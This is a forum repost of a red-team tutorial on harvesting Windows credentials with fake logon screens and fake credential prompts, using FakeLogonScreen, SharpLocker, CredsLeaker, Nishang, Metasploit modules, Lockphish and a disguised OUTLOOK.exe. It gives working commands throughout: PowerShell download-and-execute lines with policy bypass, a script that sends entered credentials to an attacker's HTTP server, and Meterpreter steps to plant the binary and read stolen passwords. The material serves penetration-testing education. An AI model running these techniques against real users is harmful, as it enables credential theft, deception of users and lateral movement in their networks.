首页
社区
课程
招聘
[转帖]Phishing Windows Credentials
发表于: 2020-3-3 12:19 4061

[转帖]Phishing Windows Credentials

2020-3-3 12:19
4061

Original link: https://pentestlab.blog/2020/03/02/phishing-windows-credentials/

 

It is very common in Windows environments when programs are executed to require from the user to enter his domain credentials for authentication like Outlook, authorization of elevation of privileges (User Account Control) or simply when Windows are inactive (Lock Screen). Mimic this behavior of Windows can lead to harvest credentials of Windows users that could be used for lateral movement during red team assessments. This technique can be useful when initial foothold has been achieved on the system and credentials of the user cannot be discovered by alternative methods.

C

Modern red teaming technique require tradecraft to be based in C# language since it allows in-memory execution by various frameworks such as Cobalt Strike, Covenant etc. The FakeLogonScreen is a Windows utility that was developed in C# by Arris Huijgen that will mimic Windows logon screen in an attempt to obtain the password of the current user.

 

imgFakdLogonScreen

 

The tool has the ability to show the background that is currently configured in order to reduce the risk of security conscious users to spot this malicious operation.

 

imgWindows Fake Logon Screen

 

When the user enter his password on the fake logon screen it will perform a validation against the Active Directory or locally to ensure that the password is correct. The password will be displayed in the console.

 

imgFake Logon Screen – Credentials

 

There is also a secondary binary which is part of the project and stores the credentials to a file (user.db) on local disk. Specifically executing the following will read the file that contains the credentials of the domain user.

type C:\Users\pentestlab.PENTESTLAB\AppData\Local\Microsoft\user.db

imgFake Logon Screen – Credentials Stored

 

A similar assembly binary called SharpLocker was developed by Matt Pickford that upon execution will show a fake logon screen to the user.

 

imgSharpLocker – Lock Screen

 

Every single keystroke will be captured on the console until the password of the user is fully uncovered.

 

imgSharpLocker – Password

PowerShell

Windows security input prompts are very common since applications in corporate environments might ask the users in regular basis to authenticate. Microsoft outlook is one product that performs this request for credentials often in a domain environment. A tool that attempts to mimic a Windows security prompt is CredsLeaker which requires a web server to store the necessary files that will read the credentials and write them in a text file and PowerShell to invoke the HTTP request. The PowerShell commands can be executed directly from a BAT file.

run.bat

imgCredsLeaker – HTTP Delivery

 

Prior to execution of the BAT file information on the project files should be modified to target the web server that stores the configuration, PHP and PowerShell files. When the BAT file is executed a Windows security popup will displayed to the user.

 

imgInput Prompt – CredsLeaker

 

The tool performs validation against the credentials and the popup will only disappear if supplied credentials are correct. The Domain, the host name, username and password will be written into the following location.

/var/www/html/creds.txt

imgCredsLeaker – Credentials

 

Matt Nelson developed a PowerShell script which will spawn an input prompt with capability to check if the credentials are valid as otherwise the prompt is not closing. The script can be executed from a remote location and the credentials will displayed in the console.

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-LoginPrompt.ps1')); Invoke-LoginPrompt

imgWindows Input Prompt – PowerShell

 

Nishang framework also contains a PowerShell script that could be used to create a fake input prompt in order to harvest windows credentials.

 

imgPowerShell – Invoke-CredentialsPhish

 

The input prompt will contain a message to the user that credentials are required to perform this operation. More security aware users might identify that something has been executed on the background but this is not fully applied to all the corporate users.

 

imgInvoke-CredentialsPhish – Input Prompt

 

When credentials of the users are entered into the Windows box these will displayed back to the console.

 

imgPowerShell – Invoke-CredentialsPhish

 

Alternatively the script could be executed from a remote location to evade detection.

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-CredentialsPhish/ps1')); Invoke-CredentialsPhish

imgShell – Invoke-CredentialsPhish

 

Rob Fuller introduced in his blog the attack of capturing Windows credentials using a Metasploit module and PowerShell. Metasploit Framework contains modules which can capture credentials over various protocols (FTP, SMB HTTP etc.).The following module can be used in order to set up a basic HTTP server that will require authentication.

use auxiliary/server/capture/http_basic
set URIPATH /

PowerShell can be used to deploy the attack of phishing windows credentials by creating an input prompt and use the credentials to initiate an HTTP request to the Metasploit server so the credentials could be captured.

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('http://10.0.0.13/');

The arbitrary input prompt needs to use UTF-16LE character encoding and converted to Base64.

cat popup.txt | iconv -t UTF-16LE
cat popup.txt | iconv -t UTF-16LE | base64 -w0

imgPowerShell – Input Prompt

 

Executing the following from a Windows command prompt or a shell will display to the user the fake windows input prompt.

powershell.exe -ep bypass -enc <base64>

imgLogin Screen – PowerShell

 

The Metasploit module will obtain the request with the credentials.

 

imgMetasploit HTTP Server – Capture Authentication

Metasploit

Metasploit Framework contains a module which has the capability to spawn an input prompt when a specific process or any process is created. The module must be linked into an existing Meterpreter session and the process needs to be defined.

use post/windows/gather/phish_windows_credentials
set SESSION 3
set PROCESS *
run

imgInput Prompt – Metasploit Module

 

The wildcard * instructs the module to monitor all the process that are running on the system and waits for a new instances to start in order to display the fake input prompt to the user.

 

imgInput Prompt Metasploit – All Processes

 

The input prompt will be displayed to the user as a credential request from the process in order to start.

 

imgWindows Input Prompt

 

When the user enter his credentials these will be captured and displayed back to the console.

 

imgMetasploit Module – Credentials

 

Alternatively the module can be configured to monitor only for the creation of a specific process.

 

imgMetasploit Module – Windows Credentials

BASH

Lockphish is another tool with capability to implement a phishing attack against the Windows logon screen. The associated template will be hosted into a PHP server and by default uses YouTube in order to redirect the user after his credentials have been submitted.

bash lockphish.sh

imgLockPhish – Installation

 

Social engineering is required in order to trick the user to click the direct link that is hosting the fake logon screen.

 

imgLockPhish – WebPage

 

A fake logon screen will be displayed on the screen of the user that will require the password of the Administrator account. However compare to other tools that target the lock screen the alignment of the password field is not accurate and the fact that requires the Administrator account instead of the current user account might alter the user. Furthermore, it doesn’t perform any validation locally or in the active directory.

 

imgLockPhish – Lock Screen

 

Once the user enter his credentials a redirection will follow to YouTube website.

 

imgLockPhish Redirection

 

The credentials will be displayed back in the console.

 

imgLockPhish Credentials

Binary

Prior to the C# and PowerShell age this attack was executed from an arbitrary executable. The binary supported two parameters in order to allow the penetration tester to specify the target domain and the file name that will store the captured credentials.

execute -f "cmd /c start OUTLOOK.exe pentestlab.local creds.txt"

imgOUTLOOK Binary

 

The binary was distinguished as an Outlook application (Outlook 2010, Outlook 2013) in order to fool the blue team since it was touching the disk. The input prompt was displayed to the user similar to PowerShell based input prompts.

 

imgOUTLOOK – Input Prompt

 

Credentials were stored into a hidden folder inside %AppData% and the following commands could be executed from a Meterpreter session to execute the attack and to read the captured credentials.

cd %AppData%
upload OUTLOOK.exe
execute -f "cmd /c start OUTLOOK.exe pentestlab.local creds.txt"
cd Local
cd Temp
cat creds.txt

imgOUTLOOK – Credentials

YouTube

https://www.youtube.com/watch?v=MqLTUZBEliE&feature=youtu.be

References

  • https://attack.mitre.org/techniques/T1141/
  • https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
  • https://github.com/enigma0x3/Invoke-LoginPrompt
  • https://github.com/samratashok/nishang/blob/master/Gather/Invoke-CredentialsPhish.ps1
  • https://github.com/bitsadmin/fakelogonscreen
  • https://github.com/Pickfordmatt/SharpLocker
  • https://malicious.link/post/2015/powershell-popups-and-capture/
  • https://github.com/Dviros/CredsLeaker
  • https://github.com/thelinuxchoice/lockphish

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 83
活跃值: (1092)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
2
已阅
2020-3-3 14:39
0
雪    币: 2510
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
3
感谢分享
2020-3-11 12:49
0
游客
登录 | 注册 方可回帖
返回
//